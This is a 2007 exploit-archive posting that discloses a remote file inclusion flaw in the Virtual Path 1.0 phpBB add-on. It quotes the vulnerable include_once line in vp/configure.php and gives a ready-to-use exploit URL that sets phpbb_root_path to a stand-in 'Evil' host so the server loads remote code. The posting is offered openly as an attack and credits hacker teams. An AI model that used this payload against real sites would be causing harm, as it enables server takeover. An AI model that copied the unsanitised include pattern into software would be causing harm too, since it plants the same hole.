[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Virtual Path 1.0 (vp/configure.php) Remote File Include Vulnerability
# Published : 2007-01-25
# Author : GoLd_M
# Previous Title : Forum Livre 1.0 (SQL Injection / XSS) Multiple Remote Vulnerabilities
# Next Title : RPW 1.0.2 (config.php sql_language) Remote File Inclusion Vulnerability
+=====================================================================
+ Virtual Path phpBB <== v1.0 |
+=====================================================================
+ Downlaoad S :http://sourceforge.net/projects/virtualpath/ |
+=====================================================================
+ Author: GolD_M = Mahmood_ali && Contact: HackEr_@W.Cn |
======================================================================
+ SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team |
+=====================================================================
+ In: /vp/configure.php |
+=====================================================================
+ Vulnerable Code: & Line : 3 |
+=====================================================================
+ include_once($phpbb_root_path. 'vp/conf.php'); |
+=====================================================================
+ Exploit: |
+=====================================================================
+ http://Victim.Com/vp/configure.php?phpbb_root_path=Evil? |
+=====================================================================
+ Tryag.Com & Dwrat.com |
+=====================================================================
# www.Syue.com [2007-01-25]